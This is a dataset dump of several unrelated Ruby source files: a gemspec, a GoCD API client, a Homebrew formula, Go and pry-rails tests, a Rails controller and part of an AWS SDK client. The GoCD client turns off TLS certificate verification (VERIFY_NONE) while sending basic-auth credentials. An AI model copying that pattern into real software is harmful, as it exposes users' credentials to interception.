hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
87f369bb819421cd54d6c63b07a37eae57167dd3 | 1,732 |
lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "vue_gen/version"
Gem::Specification.new do |spec|
spec.name = "vue_gen"
spec.version = VueGen::VERSION
spec.authors = ["ou.yun"]
spec.email = ["[email protected]"]
spec.summary = %q{Write a short summary, because RubyGems requires one.}
spec.description = %q{Write a longer description or delete this line.}
spec.homepage = "https://github.com/ouin-tci"
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
spec.metadata["allowed_push_host"] = "Set to 'http://mygemserver.com'"
spec.metadata["homepage_uri"] = spec.homepage
spec.metadata["source_code_uri"] = "Put your gem's public repo URL here."
spec.metadata["changelog_uri"] = "Put your gem's CHANGELOG.md URL here."
else
raise "RubyGems 2.0 or newer is required to protect against " \
"public gem pushes."
end
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 2.0"
spec.add_development_dependency "rake", "~> 10.0"
end
| 41.238095 | 96 | 0.669169 |
acaa4d334775caf4861f80245b0a386ea1b3aeb3 | 6,623 | require 'net/http'
require 'json'
require 'openssl'
module GocdClient
class Service
attr_reader :url
def initialize(url, username, password)
@url = url
@username = username
@password = password
end
############### Server Health ###############
def healthcheck
if version >= '17.11.0'
healthcheck_json = get('/go/api/v1/health', {"Accept" => "application/vnd.go.cd.v1+json"}).body
JSON.parse(healthcheck_json)
else
raise NotImplementedError.new
end
end
############### Agents #####################
def agents
if version >= '15.2.0'
agents_json = JSON.parse(get('/go/api/agents', {"Accept" => "application/vnd.go.cd.v4+json"}).body)
agents_json['_embedded']['agents'].map do |agent_json|
Models::Agent.new(agent_json)
end
else
raise NotImplementedError.new
end
end
def agent(uuid)
if version >= '15.2.0'
agent_json = JSON.parse(get("/go/api/agents/#{uuid}", {"Accept" => "application/vnd.go.cd.v4+json"}).body)
Models::Agent.new(agent_json)
else
raise NotImplementedError.new
end
end
############### Agent Health ###############
############### Users ######################
############### Current User ###############
############### Notification Fileters ######
############### Materials ##################
############### Backups ####################
############### Pipeline Groups ############
############### Artifacts ##################
def artifacts(pipeline_name, pipeline_counter, stage_name, stage_counter, job_name)
if version > '14.3.0'
JSON.parse(get("/go/files/#{pipeline_name}/#{pipeline_counter}/#{stage_name}/#{stage_counter}/#{job_name}.json", {'Accept' => 'application/json'}).body)
else
raise NotImplementedError.new
end
end
def artifact_download(pipeline_name, pipeline_counter, stage_name, stage_counter, job_name, source_path, destination)
endpoint = File.join("/go/files/#{pipeline_name}/#{pipeline_counter}/#{stage_name}/#{stage_counter}/#{job_name}", source_path)
connect do |http|
request = Net::HTTP::Get.new(endpoint)
request.basic_auth(@username, @password)
http.request(request) do |response|
File.open(destination, 'w') do |io|
response.read_body do |chunk|
io.write(chunk)
end
end
end
end
end
############### Pipelines ##################
def pipeline(pipeline_name, pipeline_counter)
pipeline_json = get("/go/api/pipelines/#{pipeline_name}/instance/#{pipeline_counter}", {'Accept' => "application/json"}).body
Models::Pipeline.new(JSON.parse(pipeline_json))
end
def pipeline_history(pipeline_name, offset=0)
history_json = get("/go/api/pipelines/#{pipeline_name}/history/#{offset}", {'Accept' => "application/json"}).body
Models::PipelineHistory.new(JSON.parse(history_json))
end
############### Stages #####################
def stage(pipeline_name, stage_name, pipeline_counter, stage_counter)
stage_json = get("/go/api/stages/#{pipeline_name}/#{stage_name}/instance/#{pipeline_counter}/#{stage_counter}").body
Models::Stage.new(stage_json)
end
############### Version ####################
def version
@version ||= Models::Version.new(JSON.parse(get('/go/api/version', {"Accept" => "application/vnd.go.cd.v1+json"}).body))
end
############### Extension ##################
#fetch_artifact('CP-GenerateCashReportJob/TestJobDeploy-UAT/TestJobDeploy-STG', 'buildTestPackage', 'buildTestPackage', 'GenerateCashReport-linux-x64.tar.gz', '/tmp/GenerateCashReport-linux-x64-4.tar.gz')
def fetch_artifact(pipeline_path, stage_name, job_name, source_path, destination)
pipeline_names_descending = pipeline_path.split('/').reverse
#get parent pipeline
parent_pipeline_name = pipeline_names_descending.shift
parent_pipeline = pipeline_latest_passed(parent_pipeline_name)
parent_pipeline_counter = parent_pipeline.counter
parent_stage_name = nil
parent_stage_counter = nil
pipeline_names_descending.each do |pipeline_name|
material_revision = parent_pipeline.build_cause['material_revisions'].detect do |_material_revision|
_material_revision['material']['type'] == 'Pipeline' && _material_revision['material']['description'] == pipeline_name
end
revision = material_revision['modifications'].first['revision']
parent_pipeline_name, parent_pipeline_counter, parent_stage_name, parent_stage_counter = revision.split('/')
parent_pipeline = pipeline(parent_pipeline_name, parent_pipeline_counter)
end
parent_pipeline_stage = parent_pipeline.stages.detect {|stage| stage.name == stage_name}
parent_pipeline_counter = parent_pipeline.counter
parent_stage_name = parent_pipeline_stage.name
parent_stage_counter = parent_pipeline_stage.counter
artifact_download(parent_pipeline_name, parent_pipeline_counter, parent_stage_name, parent_stage_counter, job_name, source_path, destination)
end
def pipeline_latest_passed(pipeline_name)
offset = 0
found = nil
until found do
history = pipeline_history(pipeline_name, offset)
break if history.pipelines.empty?
pipeline_descending = history.pipelines.sort_by(&:counter).reverse
pipeline_descending.each do |pipeline|
if pipeline.stages.all?(&:passed?)
found = pipeline
break
end
end
offset += 10
end
found.nil? ? nil : found
end
############### Private ##################
private
def get(endpoint, headers={})
connect do |http|
request = Net::HTTP::Get.new(endpoint, headers)
request.basic_auth(@username, @password)
http.request(request)
end
end
def connect
http = get_http(@url)
response = yield(http)
if response.code.match(/2\d{2}/)
response
else
raise("Error response code #{response.code}")
end
end
def get_http(url)
uri = URI.parse(url)
http = Net::HTTP.new(uri.host, uri.port)
if uri.kind_of?(URI::HTTPS)
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
else
http.use_ssl = false
end
http.read_timeout = @read_timeout
http
end
end
end
| 31.995169 | 208 | 0.608637 |
abfdacdf34247ad770dd737db26d150413feb559 | 115 | module SafeCredentials
class Engine < Rails::Engine
initializer "loading configuration" do
end
end
end | 16.428571 | 42 | 0.73913 |
ac8c6758e5fc15b3d27ceaf712679b2cbc0aed85 | 3,936 | class Ykman < Formula
include Language::Python::Virtualenv
desc "Tool for managing your YubiKey configuration"
homepage "https://developers.yubico.com/yubikey-manager/"
url "https://developers.yubico.com/yubikey-manager/Releases/yubikey-manager-1.0.1.tar.gz"
sha256 "1f915d8899dbcf85b6b9879f5664953ce1edcd5a503a00d03b9c6298900bfc44"
head "https://github.com/Yubico/yubikey-manager.git"
bottle do
cellar :any
sha256 "d0f7bb3507e7c4f14a8d125e189a3789a7eb2b7febd0965699449b3596dfa75e" => :mojave
sha256 "69fba1dbbe9208d29eb6cdc77aa3d4e34cb617e6d1975e9893d55e856581c6ed" => :high_sierra
sha256 "a4c492c37bec49144c5d93575d0822f3702a91f4316d1bcbe770e71510c9a97c" => :sierra
end
depends_on "swig" => :build
depends_on "libusb"
depends_on "openssl"
depends_on "python"
depends_on "ykpers"
resource "asn1crypto" do
url "https://files.pythonhosted.org/packages/fc/f1/8db7daa71f414ddabfa056c4ef792e1461ff655c2ae2928a2b675bfed6b4/asn1crypto-0.24.0.tar.gz"
sha256 "9d5c20441baf0cb60a4ac34cc447c6c189024b6b4c6cd7877034f4965c464e49"
end
resource "cffi" do
url "https://files.pythonhosted.org/packages/e7/a7/4cd50e57cc6f436f1cc3a7e8fa700ff9b8b4d471620629074913e3735fb2/cffi-1.11.5.tar.gz"
sha256 "e90f17980e6ab0f3c2f3730e56d1fe9bcba1891eeea58966e89d352492cc74f4"
end
resource "click" do
url "https://files.pythonhosted.org/packages/95/d9/c3336b6b5711c3ab9d1d3a80f1a3e2afeb9d8c02a7166462f6cc96570897/click-6.7.tar.gz"
sha256 "f15516df478d5a56180fbf80e68f206010e6d160fc39fa508b65e035fd75130b"
end
resource "cryptography" do
url "https://files.pythonhosted.org/packages/22/21/233e38f74188db94e8451ef6385754a98f3cad9b59bedf3a8e8b14988be4/cryptography-2.3.1.tar.gz"
sha256 "8d10113ca826a4c29d5b85b2c4e045ffa8bad74fb525ee0eceb1d38d4c70dfd6"
end
resource "fido2" do
url "https://files.pythonhosted.org/packages/58/0d/655ef526ab14b8eecc70f773294f15b23402d5184da290c4f23d5d893048/fido2-0.4.0.tar.gz"
sha256 "f8d84aef5b54cccfb5558f399f196d540f8dcba458862214c14f7f66c22a4488"
end
resource "idna" do
url "https://files.pythonhosted.org/packages/65/c4/80f97e9c9628f3cac9b98bfca0402ede54e0563b56482e3e6e45c43c4935/idna-2.7.tar.gz"
sha256 "684a38a6f903c1d71d6d5fac066b58d7768af4de2b832e426ec79c30daa94a16"
end
resource "ipaddress" do
url "https://files.pythonhosted.org/packages/97/8d/77b8cedcfbf93676148518036c6b1ce7f8e14bf07e95d7fd4ddcb8cc052f/ipaddress-1.0.22.tar.gz"
sha256 "b146c751ea45cad6188dd6cf2d9b757f6f4f8d6ffb96a023e6f2e26eea02a72c"
end
resource "pycparser" do
url "https://files.pythonhosted.org/packages/68/9e/49196946aee219aead1290e00d1e7fdeab8567783e83e1b9ab5585e6206a/pycparser-2.19.tar.gz"
sha256 "a988718abfad80b6b157acce7bf130a30876d27603738ac39f140993246b25b3"
end
resource "pyOpenSSL" do
url "https://files.pythonhosted.org/packages/9b/7c/ee600b2a9304d260d96044ab5c5e57aa489755b92bbeb4c0803f9504f480/pyOpenSSL-18.0.0.tar.gz"
sha256 "6488f1423b00f73b7ad5167885312bb0ce410d3312eb212393795b53c8caa580"
end
resource "pyscard" do
url "https://files.pythonhosted.org/packages/17/f3/e6e52e3dab39b26450d9fb6385c4a40f883180d6f1ee26ad4567dd243edc/pyscard-1.9.7.tar.gz"
sha256 "412c74c83e7401566e9d3d7b8b5ca965e74582a1f33179b3c1fabf1da73ebf80"
end
resource "pyusb" do
url "https://files.pythonhosted.org/packages/5f/34/2095e821c01225377dda4ebdbd53d8316d6abb243c9bee43d3888fa91dd6/pyusb-1.0.2.tar.gz"
sha256 "4e9b72cc4a4205ca64fbf1f3fff39a335512166c151ad103e55c8223ac147362"
end
resource "six" do
url "https://files.pythonhosted.org/packages/16/d8/bc6316cf98419719bd59c91742194c111b6f2e85abac88e496adefaf7afe/six-1.11.0.tar.gz"
sha256 "70e8a77beed4562e7f14fe23a786b54f6296e34344c23bc42f07b15018ff98e9"
end
def install
virtualenv_install_with_resources
end
test do
assert_match version.to_s, shell_output("#{bin}/ykman --version")
end
end
| 43.252747 | 142 | 0.818852 |
ab1505910d96224affd18d3bc516cfc713bf59d1 | 37 | require 'sensu-plugins-chef/version'
| 18.5 | 36 | 0.810811 |
e92fe8ae738b244a5d9f4c7b07f980778612d309 | 2,525 | module Core
class OrganizationsController < Core::ApplicationController
respond_to :json
before_action :filter_blocked_users, except: :index
def index
@organizations = Organization.finder(params[:q])
json = {
records: @organizations.page(params[:page]).per(params[:per]),
total: @organizations.count
}
respond_with(json)
end
def show
@organization = Organization.find(params[:id])
respond_with({ id: @organization.id, text: @organization.name })
end
def new
@organization = Organization.new
@employment = @organization.employments.new
end
def create
@organization = Organization.new(organization_params)
@employment = @organization.employments.new(employment_params)
@employment.user = current_user
new_city = params[:organization][:city_title].to_s
if new_city.present? && @organization.country
@organization.city_title = new_city
@organization.city.save!
@organization.city.create_ticket(current_user) if @organization.city.previous_changes['id']
end
if @organization.save
@organization.create_ticket(current_user)
if @organization.kind.departments_required?
redirect_to [:edit, @organization], notice: t("flash.you_have_to_fill_departments")
else
@organization.departments.create!(name: @organization.short_name)
redirect_to @employment
end
else
render :new
end
end
def edit
@organization = Organization.find(params[:id])
can_edit
end
def update
@organization = Organization.find(params[:id])
can_edit
if @organization.update(organization_params)
@organization.departments.each do |d|
d.create_ticket(current_user) if d.previous_changes['id']
end
redirect_to main_app.profile_path
else
render :edit
end
end
private
def can_edit
raise MayMay::Unauthorized unless @organization.can_edit?(current_user)
# redirect_to(main_app.profile_path)
end
def employment_params
params.require(:employment).permit(:primary)
end
def organization_params
params.require(:organization).permit(:name, :abbreviation, :country_id,
:city_title, :city_id, :kind_id, :_destroy,
departments_attributes: [ :id, :_destroy, :name ])
end
end
end
| 29.022989 | 99 | 0.646337 |
f719a95987153995fa81c3e750932edb4233efb6 | 6,262 | # frozen_string_literal: true
require "test_helper"
require "tmpdir"
if Licensed::Shell.tool_available?("go")
describe Licensed::Source::Go do
let(:gopath) { File.expand_path("../../fixtures/go", __FILE__) }
let(:fixtures) { File.join(gopath, "src/test") }
let(:config) { Licensed::Configuration.new("go" => { "GOPATH" => gopath }) }
let(:source) { Licensed::Source::Go.new(config) }
describe "enabled?" do
it "is true if go source is available" do
Dir.chdir(fixtures) do
assert source.enabled?
end
end
it "is false if go source is not available" do
Dir.mktmpdir do |dir|
Dir.chdir(dir) do
refute source.enabled?
end
end
end
end
describe "gopath" do
it "works with an absolute configuration path" do
assert_equal gopath, source.gopath
end
it "works with a configuration path relative to repository root" do
config["go"]["GOPATH"] = "test/fixtures/go"
assert_equal gopath, source.gopath
end
it "works with an expandable configuration path" do
config["go"]["GOPATH"] = "~"
assert_equal File.expand_path("~"), source.gopath
end
it "uses ENV['GOPATH'] if not set in configuration" do
begin
original_gopath = ENV["GOPATH"]
ENV["GOPATH"] = gopath
config.delete("go")
assert_equal gopath, source.gopath
# sanity test that finding dependencies using ENV works
Dir.chdir fixtures do
assert source.dependencies.detect { |d| d["name"] == "github.com/hashicorp/golang-lru" }
end
ensure
ENV["GOPATH"] = original_gopath
end
end
end
describe "dependencies" do
it "does not include the current package" do
Dir.chdir fixtures do
dep = source.dependencies.detect { |d| d["name"].end_with?("test") }
refute dep
end
end
it "includes direct dependencies" do
Dir.chdir fixtures do
dep = source.dependencies.detect { |d| d["name"] == "github.com/hashicorp/golang-lru" }
assert dep
assert_equal "go", dep["type"]
assert dep["homepage"]
assert dep["summary"]
end
end
it "includes indirect dependencies" do
Dir.chdir fixtures do
dep = source.dependencies.detect { |d| d["name"] == "github.com/hashicorp/golang-lru/simplelru" }
assert dep
assert_equal "go", dep["type"]
assert dep["homepage"]
end
end
it "doesn't include dependencies from the go std library" do
Dir.chdir fixtures do
refute source.dependencies.any? { |d| d["name"] == "runtime" }
end
end
it "doesn't include vendored dependencies from the go std library" do
Dir.chdir fixtures do
refute source.dependencies.any? { |d| d["name"] == "golang.org/x/net/http2/hpack" }
end
end
describe "with unavailable packages" do
# use a custom go path that doesn't contain go libraries installed from
# setup scripts
let(:gopath) { Dir.mktmpdir }
before do
# fixtures now points at the tmp location, copy go source to tmp
# fixtures location
FileUtils.mkdir_p File.join(gopath, "src")
FileUtils.cp_r File.expand_path("../../fixtures/go/src/test", __FILE__), fixtures
# the tests are expected to print errors from `go list` which
# should not be hidden during normal usage. hide that output during
# the test execution
@previous_stderr = $stderr
$stderr.reopen(File.new("/dev/null", "w"))
end
after do
$stderr.reopen(@previous_stderr)
FileUtils.rm_rf gopath
end
it "do not raise an error if ignored" do
config.ignore("type" => "go", "name" => "github.com/hashicorp/golang-lru")
Dir.chdir fixtures do
source.dependencies
end
end
it "raises an error" do
Dir.chdir fixtures do
assert_raises RuntimeError do
source.dependencies
end
end
end
end
describe "search root" do
it "is set to the vendor path for vendored packages" do
Dir.chdir fixtures do
dep = source.dependencies.detect { |d| d["name"] == "github.com/gorilla/context" }
assert dep
assert_equal File.join(fixtures, "vendor"), dep.search_root
end
end
it "is set to #gopath" do
Dir.chdir fixtures do
dep = source.dependencies.detect { |d| d["name"] == "github.com/hashicorp/golang-lru" }
assert dep
assert_equal gopath, dep.search_root
end
end
end
describe "package version" do
describe "with go module information" do
let(:fixtures) { File.join(gopath, "src/modules_test") }
it "is the module version" do
skip unless source.go_version >= Gem::Version.new("1.11.0")
begin
ENV["GO111MODULE"] = "on"
Dir.chdir fixtures do
dep = source.dependencies.detect { |d| d["name"] == "github.com/gorilla/context" }
assert_equal "v1.1.1", dep["version"]
end
ensure
ENV["GO111MODULE"] = nil
end
end
end
describe "without go module information" do
it "is nil when git is unavailable" do
Dir.chdir fixtures do
Licensed::Git.stub(:available?, false) do
dep = source.dependencies.detect { |d| d["name"] == "github.com/gorilla/context" }
assert_nil dep["version"]
end
end
end
it "is the latest git SHA of the package directory" do
Dir.chdir fixtures do
dep = source.dependencies.detect { |d| d["name"] == "github.com/gorilla/context" }
assert_match(/[a-f0-9]{40}/, dep["version"])
end
end
end
end
end
end
end
| 31.626263 | 107 | 0.565474 |
abf51c4c05d0904222773a53636a8cac2e65d797 | 1,364 | # encoding: UTF-8
require 'spec_helper'
describe "show-model" do
it "should print one ActiveRecord model" do
output = mock_pry('show-model Beer', 'exit-all')
expected = <<MODEL
Beer
id: integer
name: string
type: string
rating: integer
ibu: integer
abv: integer
belongs_to :hacker
MODEL
output.must_equal expected
end
if defined? Mongoid
it "should print one Mongoid model" do
output = mock_pry('show-model Artist', 'exit-all')
expected = <<MODEL
Artist
_id: BSON::ObjectId
name: String
embeds_one :beer (validate)
embeds_many :instruments (validate)
MODEL
output.gsub!(/^ *_type: String\n/, '') # mongoid 3.0 and 3.1 differ on this
output.gsub!(/Moped::BSON/, 'BSON') # mongoid 3 and 4 differ on this
output.must_equal expected
end
end
it "should print an error if the model doesn't exist" do
output = mock_pry('show-model FloojBulb', 'exit-all')
output.must_equal "Couldn't find model FloojBulb!\n"
end
it "should print an error if it doesn't know what to do with the model" do
output = mock_pry('show-model PryRails', 'exit-all')
output.must_equal "Don't know how to show PryRails!\n"
end
it "should print help if no model name is given" do
output = mock_pry('show-model', 'exit-all')
output.must_match(/Usage: show-model/)
end
end
| 24.357143 | 81 | 0.677419 |
e2db0e0d46cf4c1639497fac1d3a2f1cea4467a3 | 1,584 | require_relative 'form_request'
require 'open-uri'
require 'hashie'
Hash.send :include, Hashie::Extensions
module ResponsesApi
class RetrieveResponsesRequest < FormRequest
ISO_8601_FORMAT = '%Y-%m-%dT%H:%M:%S'.freeze
def initialize(form_id, token: APIConfig.token, page_size: 25, page: nil, ts_since: nil, ts_until: nil, after: nil, before: nil, completed: true,
sort: nil, query: nil, fields: nil)
url = "#{APIConfig.api_request_url}/forms/#{form_id}/responses?"
url << "page_size=#{page_size}&" unless page_size.nil?
url << "page=#{page}&" unless page.nil?
url << "since=#{ts_since.utc.strftime(ISO_8601_FORMAT)}&" unless ts_since.nil?
url << "until=#{ts_until.utc.strftime(ISO_8601_FORMAT)}&" unless ts_until.nil?
url << "after=#{after}&" unless after.nil?
url << "before=#{before}&" unless before.nil?
url << "completed=#{completed}&" unless completed.nil?
url << "sort=#{sort}&" unless sort.nil?
url << "query=#{query}&" unless query.nil?
url << "fields=#{fields}&" unless fields.nil?
r = {
method: :get,
url: url
}
r[:headers] = { 'Authorization' => "Bearer #{token}" } unless token.nil?
request(r)
end
def success?
@response.code == 200 && json?
end
def responses(hashie: true)
if hashie
Hashie::Mash.new(json).items
else
json.fetch(:items)
end
end
def page_count
json.fetch(:page_count)
end
def total_items
json.fetch(:total_items)
end
end
end
| 29.886792 | 149 | 0.612374 |
6a5a90847460284587dd16dbf304b5075a36942f | 334 | class AddEditableToSysEditors < ActiveRecord::Migration
def up
add_reference :sys_editors, :editable, index: true, polymorphic: true
GpArticle::Doc.find_each {|d| d.editors << Sys::Editor.find_by(parent_unid: d.unid) }
end
def down
remove_reference :sys_editors, :editable, index: true, polymorphic: true
end
end
| 30.363636 | 89 | 0.739521 |
e84fc658f967b8b51cb385ce8a1d83e123958609 | 92,358 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'seahorse/client/plugins/content_length.rb'
require 'aws-sdk-core/plugins/credentials_configuration.rb'
require 'aws-sdk-core/plugins/logging.rb'
require 'aws-sdk-core/plugins/param_converter.rb'
require 'aws-sdk-core/plugins/param_validator.rb'
require 'aws-sdk-core/plugins/user_agent.rb'
require 'aws-sdk-core/plugins/helpful_socket_errors.rb'
require 'aws-sdk-core/plugins/retry_errors.rb'
require 'aws-sdk-core/plugins/global_configuration.rb'
require 'aws-sdk-core/plugins/regional_endpoint.rb'
require 'aws-sdk-core/plugins/endpoint_discovery.rb'
require 'aws-sdk-core/plugins/endpoint_pattern.rb'
require 'aws-sdk-core/plugins/response_paging.rb'
require 'aws-sdk-core/plugins/stub_responses.rb'
require 'aws-sdk-core/plugins/idempotency_token.rb'
require 'aws-sdk-core/plugins/jsonvalue_converter.rb'
require 'aws-sdk-core/plugins/client_metrics_plugin.rb'
require 'aws-sdk-core/plugins/client_metrics_send_plugin.rb'
require 'aws-sdk-core/plugins/transfer_encoding.rb'
require 'aws-sdk-core/plugins/http_checksum.rb'
require 'aws-sdk-core/plugins/checksum_algorithm.rb'
require 'aws-sdk-core/plugins/defaults_mode.rb'
require 'aws-sdk-core/plugins/recursion_detection.rb'
require 'aws-sdk-core/plugins/signature_v4.rb'
require 'aws-sdk-core/plugins/protocols/rest_json.rb'
Aws::Plugins::GlobalConfiguration.add_identifier(:iottwinmaker)
module Aws::IoTTwinMaker
# An API client for IoTTwinMaker. To construct a client, you need to configure a `:region` and `:credentials`.
#
# client = Aws::IoTTwinMaker::Client.new(
# region: region_name,
# credentials: credentials,
# # ...
# )
#
# For details on configuring region and credentials see
# the [developer guide](/sdk-for-ruby/v3/developer-guide/setup-config.html).
#
# See {#initialize} for a full list of supported configuration options.
class Client < Seahorse::Client::Base
include Aws::ClientStubs
@identifier = :iottwinmaker
set_api(ClientApi::API)
add_plugin(Seahorse::Client::Plugins::ContentLength)
add_plugin(Aws::Plugins::CredentialsConfiguration)
add_plugin(Aws::Plugins::Logging)
add_plugin(Aws::Plugins::ParamConverter)
add_plugin(Aws::Plugins::ParamValidator)
add_plugin(Aws::Plugins::UserAgent)
add_plugin(Aws::Plugins::HelpfulSocketErrors)
add_plugin(Aws::Plugins::RetryErrors)
add_plugin(Aws::Plugins::GlobalConfiguration)
add_plugin(Aws::Plugins::RegionalEndpoint)
add_plugin(Aws::Plugins::EndpointDiscovery)
add_plugin(Aws::Plugins::EndpointPattern)
add_plugin(Aws::Plugins::ResponsePaging)
add_plugin(Aws::Plugins::StubResponses)
add_plugin(Aws::Plugins::IdempotencyToken)
add_plugin(Aws::Plugins::JsonvalueConverter)
add_plugin(Aws::Plugins::ClientMetricsPlugin)
add_plugin(Aws::Plugins::ClientMetricsSendPlugin)
add_plugin(Aws::Plugins::TransferEncoding)
add_plugin(Aws::Plugins::HttpChecksum)
add_plugin(Aws::Plugins::ChecksumAlgorithm)
add_plugin(Aws::Plugins::DefaultsMode)
add_plugin(Aws::Plugins::RecursionDetection)
add_plugin(Aws::Plugins::SignatureV4)
add_plugin(Aws::Plugins::Protocols::RestJson)
# @overload initialize(options)
# @param [Hash] options
# @option options [required, Aws::CredentialProvider] :credentials
# Your AWS credentials. This can be an instance of any one of the
# following classes:
#
# * `Aws::Credentials` - Used for configuring static, non-refreshing
# credentials.
#
# * `Aws::SharedCredentials` - Used for loading static credentials from a
# shared file, such as `~/.aws/config`.
#
# * `Aws::AssumeRoleCredentials` - Used when you need to assume a role.
#
# * `Aws::AssumeRoleWebIdentityCredentials` - Used when you need to
# assume a role after providing credentials via the web.
#
# * `Aws::SSOCredentials` - Used for loading credentials from AWS SSO using an
# access token generated from `aws login`.
#
# * `Aws::ProcessCredentials` - Used for loading credentials from a
# process that outputs to stdout.
#
# * `Aws::InstanceProfileCredentials` - Used for loading credentials
# from an EC2 IMDS on an EC2 instance.
#
# * `Aws::ECSCredentials` - Used for loading credentials from
# instances running in ECS.
#
# * `Aws::CognitoIdentityCredentials` - Used for loading credentials
# from the Cognito Identity service.
#
# When `:credentials` are not configured directly, the following
# locations will be searched for credentials:
#
# * `Aws.config[:credentials]`
# * The `:access_key_id`, `:secret_access_key`, and `:session_token` options.
# * ENV['AWS_ACCESS_KEY_ID'], ENV['AWS_SECRET_ACCESS_KEY']
# * `~/.aws/credentials`
# * `~/.aws/config`
# * EC2/ECS IMDS instance profile - When used by default, the timeouts
# are very aggressive. Construct and pass an instance of
# `Aws::InstanceProfileCredentails` or `Aws::ECSCredentials` to
# enable retries and extended timeouts. Instance profile credential
# fetching can be disabled by setting ENV['AWS_EC2_METADATA_DISABLED']
# to true.
#
# @option options [required, String] :region
# The AWS region to connect to. The configured `:region` is
# used to determine the service `:endpoint`. When not passed,
# a default `:region` is searched for in the following locations:
#
# * `Aws.config[:region]`
# * `ENV['AWS_REGION']`
# * `ENV['AMAZON_REGION']`
# * `ENV['AWS_DEFAULT_REGION']`
# * `~/.aws/credentials`
# * `~/.aws/config`
#
# @option options [String] :access_key_id
#
# @option options [Boolean] :active_endpoint_cache (false)
# When set to `true`, a thread polling for endpoints will be running in
# the background every 60 secs (default). Defaults to `false`.
#
# @option options [Boolean] :adaptive_retry_wait_to_fill (true)
# Used only in `adaptive` retry mode. When true, the request will sleep
# until there is sufficent client side capacity to retry the request.
# When false, the request will raise a `RetryCapacityNotAvailableError` and will
# not retry instead of sleeping.
#
# @option options [Boolean] :client_side_monitoring (false)
# When `true`, client-side metrics will be collected for all API requests from
# this client.
#
# @option options [String] :client_side_monitoring_client_id ("")
# Allows you to provide an identifier for this client which will be attached to
# all generated client side metrics. Defaults to an empty string.
#
# @option options [String] :client_side_monitoring_host ("127.0.0.1")
# Allows you to specify the DNS hostname or IPv4 or IPv6 address that the client
# side monitoring agent is running on, where client metrics will be published via UDP.
#
# @option options [Integer] :client_side_monitoring_port (31000)
# Required for publishing client metrics. The port that the client side monitoring
# agent is running on, where client metrics will be published via UDP.
#
# @option options [Aws::ClientSideMonitoring::Publisher] :client_side_monitoring_publisher (Aws::ClientSideMonitoring::Publisher)
# Allows you to provide a custom client-side monitoring publisher class. By default,
# will use the Client Side Monitoring Agent Publisher.
#
# @option options [Boolean] :convert_params (true)
# When `true`, an attempt is made to coerce request parameters into
# the required types.
#
# @option options [Boolean] :correct_clock_skew (true)
# Used only in `standard` and adaptive retry modes. Specifies whether to apply
# a clock skew correction and retry requests with skewed client clocks.
#
# @option options [String] :defaults_mode ("legacy")
# See {Aws::DefaultsModeConfiguration} for a list of the
# accepted modes and the configuration defaults that are included.
#
# @option options [Boolean] :disable_host_prefix_injection (false)
# Set to true to disable SDK automatically adding host prefix
# to default service endpoint when available.
#
# @option options [String] :endpoint
# The client endpoint is normally constructed from the `:region`
# option. You should only configure an `:endpoint` when connecting
# to test or custom endpoints. This should be a valid HTTP(S) URI.
#
# @option options [Integer] :endpoint_cache_max_entries (1000)
# Used for the maximum size limit of the LRU cache storing endpoints data
# for endpoint discovery enabled operations. Defaults to 1000.
#
# @option options [Integer] :endpoint_cache_max_threads (10)
# Used for the maximum threads in use for polling endpoints to be cached, defaults to 10.
#
# @option options [Integer] :endpoint_cache_poll_interval (60)
# When :endpoint_discovery and :active_endpoint_cache is enabled,
# Use this option to config the time interval in seconds for making
# requests fetching endpoints information. Defaults to 60 sec.
#
# @option options [Boolean] :endpoint_discovery (false)
# When set to `true`, endpoint discovery will be enabled for operations when available.
#
# @option options [Aws::Log::Formatter] :log_formatter (Aws::Log::Formatter.default)
# The log formatter.
#
# @option options [Symbol] :log_level (:info)
# The log level to send messages to the `:logger` at.
#
# @option options [Logger] :logger
# The Logger instance to send log messages to. If this option
# is not set, logging will be disabled.
#
# @option options [Integer] :max_attempts (3)
# An integer representing the maximum number attempts that will be made for
# a single request, including the initial attempt. For example,
# setting this value to 5 will result in a request being retried up to
# 4 times. Used in `standard` and `adaptive` retry modes.
#
# @option options [String] :profile ("default")
# Used when loading credentials from the shared credentials file
# at HOME/.aws/credentials. When not specified, 'default' is used.
#
# @option options [Proc] :retry_backoff
# A proc or lambda used for backoff. Defaults to 2**retries * retry_base_delay.
# This option is only used in the `legacy` retry mode.
#
# @option options [Float] :retry_base_delay (0.3)
# The base delay in seconds used by the default backoff function. This option
# is only used in the `legacy` retry mode.
#
# @option options [Symbol] :retry_jitter (:none)
# A delay randomiser function used by the default backoff function.
# Some predefined functions can be referenced by name - :none, :equal, :full,
# otherwise a Proc that takes and returns a number. This option is only used
# in the `legacy` retry mode.
#
# @see https://www.awsarchitectureblog.com/2015/03/backoff.html
#
# @option options [Integer] :retry_limit (3)
# The maximum number of times to retry failed requests. Only
# ~ 500 level server errors and certain ~ 400 level client errors
# are retried. Generally, these are throttling errors, data
# checksum errors, networking errors, timeout errors, auth errors,
# endpoint discovery, and errors from expired credentials.
# This option is only used in the `legacy` retry mode.
#
# @option options [Integer] :retry_max_delay (0)
# The maximum number of seconds to delay between retries (0 for no limit)
# used by the default backoff function. This option is only used in the
# `legacy` retry mode.
#
# @option options [String] :retry_mode ("legacy")
# Specifies which retry algorithm to use. Values are:
#
# * `legacy` - The pre-existing retry behavior. This is default value if
# no retry mode is provided.
#
# * `standard` - A standardized set of retry rules across the AWS SDKs.
# This includes support for retry quotas, which limit the number of
# unsuccessful retries a client can make.
#
# * `adaptive` - An experimental retry mode that includes all the
# functionality of `standard` mode along with automatic client side
